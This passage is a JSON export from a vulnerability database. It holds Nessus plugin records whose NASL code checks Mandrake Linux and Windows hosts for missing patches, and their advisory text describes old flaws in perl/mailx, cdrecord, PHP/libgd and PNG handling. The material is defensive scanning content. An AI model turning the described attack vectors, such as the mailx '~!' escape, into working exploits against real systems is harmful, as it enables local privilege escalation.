security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandrake Linux Security Advisory : perl (MDKSA-2000:031)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:40:05"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "bc3e00b94b9258e9075ca385ed01603e"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "aaa1b6be87e51eb4b2af0be0136613d0"}, {"key": "href", "hash": "17bffb189c965b73517d7231ad25fa96"}, {"key": "modified", "hash": "e2914120514a29eeccc01e381df164d8"}, {"key": "naslFamily", "hash": "526837706681051344a466f9e51ac982"}, {"key": "pluginID", "hash": "9a44cb53d85a6a5d614dbe4d1e16b035"}, {"key": "published", "hash": "aac8b5f7a52e4c207528727e825ec5b2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "98767e7a1bdf2efbffee9a581c7265f4"}, {"key": "title", "hash": "5b71f52d6bb13829e24a8c452bcff759"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "f211ffca4681689aa920e50e374240419394ead052bdb4de72a17b58a36ef22a", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["MANDRAKE_MDKSA-2000-009.NASL", "MANDRAKE_MDKSA-2006-122.NASL", "SMB_NT_MS05-009.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13352", "SECURITYVULNS:DOC:13353", "SECURITYVULNS:DOC:8854", "SECURITYVULNS:DOC:7775", "SECURITYVULNS:DOC:7769", "SECURITYVULNS:DOC:6820", "SECURITYVULNS:DOC:6819", "SECURITYVULNS:DOC:6109"]}, {"type": "exploitdb", "idList": ["EDB-ID:25094"]}, {"type": "cert", "idList": ["VU:734644", "VU:192995", "VU:234971"]}], "modified": "2019-02-21T01:17:32"}, "score": {"value": 0.2, "vector": "NONE", "modified": "2019-02-21T01:17:32"}, "vulnersScore": 0.2}, "objectVersion": "1.3", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:031. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61827);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_xref(name:\"MDKSA\", value:\"2000:031\");\n\n script_name(english:\"Mandrake Linux Security Advisory : perl (MDKSA-2000:031)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a vulnerability that exists when using setuidperl together\nwith the mailx program. In some cases, setuidperl will warn root that\nsomething has going on. The setuidperl program uses /bin/mail to send\nthe message, as root, with the environment preserved. An undocumented\nfeature of /bin/mail consists of it interpretting the ~! sequence even\nif it is not running on the terminal, and the message also contains\nthe script name, taken from argv[1]. With all of this combined, it is\npossible to execute a command using ~! passed in the script name to\ncreate a suid shell. The instance of setuidperl sending such a message\ncan only be reached if you try to fool perl into forcing the execution\nof one file instead of another. This vulnerability may not be limited\nto just the mailx program, which is why an upgrade for perl is\nprovided as opposed to an upgrade for mailx.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl and / or perl-base packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"perl-5.00503-5mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"perl-5.00503-5mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"perl-5.00503-11mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"perl-base-5.00503-11mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"perl-5.600-5mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"perl-base-5.600-5mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Mandriva Local Security Checks", "pluginID": "61827", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.0", "p-cpe:/a:mandriva:linux:perl-base", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "cpe:/o:mandrakesoft:mandrake_linux:6.1", "p-cpe:/a:mandriva:linux:perl", "cpe:/o:mandrakesoft:mandrake_linux:6.0"], "scheme": null}

{"nessus": [{"lastseen": "2019-02-21T01:17:32", "bulletinFamily": "scanner", "description": "The linux cdrecord binary is vulnerable to a locally exploitable buffer overflow attack. When installed on a Linux-Mandrake distribution, it is by default setgid 'cdburner' (which is a group, gid: 80, that is created for the application). The overflow condition is the result of no bounds checking on the 'dev=' argument passed to cdburner at execution time. This vulnerability can be exploited to execute arbitrary commands with the gid 'cdburner'.", "modified": "2018-07-19T00:00:00", "id": "MANDRAKE_MDKSA-2000-009.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61807", "published": "2012-09-06T00:00:00", "title": "Mandrake Linux Security Advisory : cdrecord (MDKSA-2000:009)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:009. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61807);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_xref(name:\"MDKSA\", value:\"2000:009\");\n\n script_name(english:\"Mandrake Linux Security Advisory : cdrecord (MDKSA-2000:009)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The linux cdrecord binary is vulnerable to a locally exploitable\nbuffer overflow attack. When installed on a Linux-Mandrake\ndistribution, it is by default setgid 'cdburner' (which is a group,\ngid: 80, that is created for the application). The overflow condition\nis the result of no bounds checking on the 'dev=' argument passed to\ncdburner at execution time. This vulnerability can be exploited to\nexecute arbitrary commands with the gid 'cdburner'.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cdrecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cdrecord-cdda2wav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:cdrecord-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mkisofs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"cdrecord-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"cdrecord-cdda2wav-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"cdrecord-devel-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"mkisofs-1.12.1-4mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"cdrecord-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"cdrecord-cdda2wav-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"cdrecord-devel-1.8.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"mkisofs-1.12.1-4mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"cdrecord-1.8.1-4mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:09:18", "bulletinFamily": "scanner", "description": "Multiple buffer overflows in the gd graphics library (libgd) 2.0.21 and earlier may allow remote attackers to execute arbitrary code via malformed image files that trigger the overflows due to improper calls to the gdMalloc function. One instance in gd_io_dp.c does not appear to be corrected in the embedded copy of GD used in php to build the php-gd package. (CVE-2004-0941)\n\nInteger overflows were reported in the GD Graphics Library (libgd) 2.0.28, and possibly other versions. These overflows allow remote attackers to cause a denial of service and possibly execute arbitrary code via PNG image files with large image rows values that lead to a heap-based buffer overflow in the gdImageCreateFromPngCtx() function.\nPHP, as packaged in Mandriva Linux, contains an embedded copy of the GD library, used to build the php-gd package. (CVE-2004-0990)\n\nThe c-client library 2000, 2001, or 2004 for PHP 3.x, 4.x, and 5.x, when used in applications that accept user-controlled input for the mailbox argument to the imap_open function, allow remote attackers to obtain access to an IMAP stream data structure and conduct unauthorized IMAP actions. (CVE-2006-1017)\n\nInteger overflow in the wordwrap function in string.c in might allow context-dependent attackers to execute arbitrary code via certain long arguments that cause a small buffer to be allocated, which triggers a heap-based buffer overflow in a memcpy function call, a different vulnerability than CVE-2002-1396. (CVE-2006-1990) The previous update for this issue did not resolve the issue on 64bit platforms.\n\nThe cURL library (libcurl) in PHP 4.4.2 and 5.1.4 allows attackers to bypass safe mode and read files via a file:// request containing nul characters. (CVE-2006-2563)\n\nBuffer consumption vulnerability in the tempnam function in PHP 5.1.4 and 4.x before 4.4.3 allows local users to bypass restrictions and create PHP files with fixed names in other directories via a pathname argument longer than MAXPATHLEN, which prevents a unique string from being appended to the filename. (CVE-2006-2660)\n\nThe LZW decoding in the gdImageCreateFromGifPtr function in the Thomas Boutell graphics draw (GD) library (aka libgd) 2.0.33 allows remote attackers to cause a denial of service (CPU consumption) via malformed GIF data that causes an infinite loop. PHP, as packaged in Mandriva Linux, contains an embedded copy of the GD library, used to build the php-gd package. (CVE-2006-2906)\n\nThe error_log function in PHP allows local users to bypass safe mode and open_basedir restrictions via a 'php://' or other scheme in the third argument, which disables safe mode. (CVE-2006-3011)\n\nAn unspecified vulnerability in session.c in PHP before 5.1.3 has unknown impact and attack vectors, related to 'certain characters in session names', including special characters that are frequently associated with CRLF injection, SQL injection, and cross-site scripting (XSS) vulnerabilities. NOTE: while the nature of the vulnerability is unspecified, it is likely that this is related to a violation of an expectation by PHP applications that the session name is alphanumeric, as implied in the PHP manual for session_name().\n(CVE-2006-3016)\n\nAn unspecified vulnerability in PHP before 5.1.3 can prevent a variable from being unset even when the unset function is called, which might cause the variable's value to be used in security-relevant operations. (CVE-2006-3017)\n\nAn unspecified vulnerability in the session extension functionality in PHP before 5.1.3 has unkown impact and attack vectors related to heap corruption. (CVE-2006-3018)\n\nMultiple heap-based buffer overflows in the (1) str_repeat and (2) wordwrap functions in ext/standard/string.c in PHP before 5.1.5, when used on a 64-bit system, have unspecified impact and attack vectors, a different vulnerability than CVE-2006-1990. (CVE-2006-4482)\n\nThe cURL extension files (1) ext/curl/interface.c and (2) ext/curl/streams.c in PHP before 5.1.5 permit the CURLOPT_FOLLOWLOCATION option when open_basedir or safe_mode is enabled, which allows attackers to perform unauthorized actions, possibly related to the realpath cache. (CVE-2006-4483)\n\nUnspecified vulnerability in PHP before 5.1.6, when running on a 64-bit system, has unknown impact and attack vectors related to the memory_limit restriction. (CVE-2006-4486)\n\nThe GD related issues (CVE-2004-0941, CVE-2004-0990, CVE-2006-2906) affect only Corporate 3 and Mandrake Network Firewall 2.\n\nThe php-curl issues (CVE-2006-2563, CVE-2006-4483) affect only Mandriva 2006.0.\n\nUpdated packages have been patched to address all these issues. Once these packages have been installed, you will need to restart Apache (service httpd restart) in order for the changes to take effect.", "modified": "2018-07-19T00:00:00", "id": "MANDRAKE_MDKSA-2006-122.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22053", "published": "2006-07-17T00:00:00", "title": "Mandrake Linux Security Advisory : php (MDKSA-2006:122)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:122. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22053);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2018/07/19 20:59:14\");\n\n script_cve_id(\"CVE-2004-0941\", \"CVE-2004-0990\", \"CVE-2006-1017\", \"CVE-2006-1990\", \"CVE-2006-1991\", \"CVE-2006-2563\", \"CVE-2006-2660\", \"CVE-2006-2906\", \"CVE-2006-3011\", \"CVE-2006-3016\", \"CVE-2006-3017\", \"CVE-2006-3018\", \"CVE-2006-4482\", \"CVE-2006-4483\", \"CVE-2006-4486\");\n script_bugtraq_id(11523);\n script_xref(name:\"MDKSA\", value:\"2006:122\");\n\n script_name(english:\"Mandrake Linux Security Advisory : php (MDKSA-2006:122)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple buffer overflows in the gd graphics library (libgd) 2.0.21\nand earlier may allow remote attackers to execute arbitrary code via\nmalformed image files that trigger the overflows due to improper calls\nto the gdMalloc function. One instance in gd_io_dp.c does not appear\nto be corrected in the embedded copy of GD used in php to build the\nphp-gd package. (CVE-2004-0941)\n\nInteger overflows were reported in the GD Graphics Library (libgd)\n2.0.28, and possibly other versions. These overflows allow remote\nattackers to cause a denial of service and possibly execute arbitrary\ncode via PNG image files with large image rows values that lead to a\nheap-based buffer overflow in the gdImageCreateFromPngCtx() function.\nPHP, as packaged in Mandriva Linux, contains an embedded copy of the\nGD library, used to build the php-gd package. (CVE-2004-0990)\n\nThe c-client library 2000, 2001, or 2004 for PHP 3.x, 4.x, and 5.x,\nwhen used in applications that accept user-controlled input for the\nmailbox argument to the imap_open function, allow remote attackers to\nobtain access to an IMAP stream data structure and conduct\nunauthorized IMAP actions. (CVE-2006-1017)\n\nInteger overflow in the wordwrap function in string.c in might allow\ncontext-dependent attackers to execute arbitrary code via certain long\narguments that cause a small buffer to be allocated, which triggers a\nheap-based buffer overflow in a memcpy function call, a different\nvulnerability than CVE-2002-1396. (CVE-2006-1990) The previous update\nfor this issue did not resolve the issue on 64bit platforms.\n\nThe cURL library (libcurl) in PHP 4.4.2 and 5.1.4 allows attackers to\nbypass safe mode and read files via a file:// request containing nul\ncharacters. (CVE-2006-2563)\n\nBuffer consumption vulnerability in the tempnam function in PHP 5.1.4\nand 4.x before 4.4.3 allows local users to bypass restrictions and\ncreate PHP files with fixed names in other directories via a pathname\nargument longer than MAXPATHLEN, which prevents a unique string from\nbeing appended to the filename. (CVE-2006-2660)\n\nThe LZW decoding in the gdImageCreateFromGifPtr function in the Thomas\nBoutell graphics draw (GD) library (aka libgd) 2.0.33 allows remote\nattackers to cause a denial of service (CPU consumption) via malformed\nGIF data that causes an infinite loop. PHP, as packaged in Mandriva\nLinux, contains an embedded copy of the GD library, used to build the\nphp-gd package. (CVE-2006-2906)\n\nThe error_log function in PHP allows local users to bypass safe mode\nand open_basedir restrictions via a 'php://' or other scheme in the\nthird argument, which disables safe mode. (CVE-2006-3011)\n\nAn unspecified vulnerability in session.c in PHP before 5.1.3 has\nunknown impact and attack vectors, related to 'certain characters in\nsession names', including special characters that are frequently\nassociated with CRLF injection, SQL injection, and cross-site\nscripting (XSS) vulnerabilities. NOTE: while the nature of the\nvulnerability is unspecified, it is likely that this is related to a\nviolation of an expectation by PHP applications that the session name\nis alphanumeric, as implied in the PHP manual for session_name().\n(CVE-2006-3016)\n\nAn unspecified vulnerability in PHP before 5.1.3 can prevent a\nvariable from being unset even when the unset function is called,\nwhich might cause the variable's value to be used in security-relevant\noperations. (CVE-2006-3017)\n\nAn unspecified vulnerability in the session extension functionality in\nPHP before 5.1.3 has unkown impact and attack vectors related to heap\ncorruption. (CVE-2006-3018)\n\nMultiple heap-based buffer overflows in the (1) str_repeat and (2)\nwordwrap functions in ext/standard/string.c in PHP before 5.1.5, when\nused on a 64-bit system, have unspecified impact and attack vectors, a\ndifferent vulnerability than CVE-2006-1990. (CVE-2006-4482)\n\nThe cURL extension files (1) ext/curl/interface.c and (2)\next/curl/streams.c in PHP before 5.1.5 permit the\nCURLOPT_FOLLOWLOCATION option when open_basedir or safe_mode is\nenabled, which allows attackers to perform unauthorized actions,\npossibly related to the realpath cache. (CVE-2006-4483)\n\nUnspecified vulnerability in PHP before 5.1.6, when running on a\n64-bit system, has unknown impact and attack vectors related to the\nmemory_limit restriction. (CVE-2006-4486)\n\nThe GD related issues (CVE-2004-0941, CVE-2004-0990, CVE-2006-2906)\naffect only Corporate 3 and Mandrake Network Firewall 2.\n\nThe php-curl issues (CVE-2006-2563, CVE-2006-4483) affect only\nMandriva 2006.0.\n\nUpdated packages have been patched to address all these issues. Once\nthese packages have been installed, you will need to restart Apache\n(service httpd restart) in order for the changes to take effect.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php_common432\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp_common432\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php432-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64php_common432-4.3.10-7.14.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libphp_common432-4.3.10-7.14.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"php-cgi-4.3.10-7.14.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"php-cli-4.3.10-7.14.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"php-imap-4.3.10-6.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"php432-devel-4.3.10-7.14.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.0.4-9.12.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libphp5_common5-5.0.4-9.12.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-cgi-5.0.4-9.12.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-cli-5.0.4-9.12.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-curl-5.0.4-1.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-devel-5.0.4-9.12.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-fcgi-5.0.4-9.12.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-imap-5.0.4-2.3.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:08:21", "bulletinFamily": "scanner", "description": "The remote host is running either Windows Media Player 9 or MSN Messenger.\n\nThere is a vulnerability in the remote version of this software that could allow an attacker to execute arbitrary code on the remote host.\n\nTo exploit this flaw, one attacker would need to set up a rogue PNG image and send it to a victim on the remote host.", "modified": "2018-11-15T00:00:00", "id": "SMB_NT_MS05-009.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16328", "published": "2005-02-08T00:00:00", "title": "MS05-009: Vulnerability in PNG Processing Could Allow Remote Code Execution (890261)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16328);\n script_version(\"1.41\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2004-1244\", \"CVE-2004-0597\");\n script_bugtraq_id(12485, 12506);\n script_xref(name:\"MSFT\", value:\"MS05-009\");\n script_xref(name:\"CERT\", value:\"259890\");\n script_xref(name:\"CERT\", value:\"388984\");\n script_xref(name:\"CERT\", value:\"817368\");\n script_xref(name:\"EDB-ID\", value:\"25094\");\n script_xref(name:\"EDB-ID\", value:\"393\");\n script_xref(name:\"EDB-ID\", value:\"389\");\n script_xref(name:\"MSKB\", value:\"885492\");\n script_xref(name:\"MSKB\", value:\"887472\");\n\n script_name(english:\"MS05-009: Vulnerability in PNG Processing Could Allow Remote Code Execution (890261)\");\n script_summary(english:\"Checks the version of Media Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through the Media\nPlayer.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running either Windows Media Player 9 or MSN\nMessenger.\n\nThere is a vulnerability in the remote version of this software that\ncould allow an attacker to execute arbitrary code on the remote host.\n\nTo exploit this flaw, one attacker would need to set up a rogue PNG\nimage and send it to a victim on the remote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2005/ms05-009\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 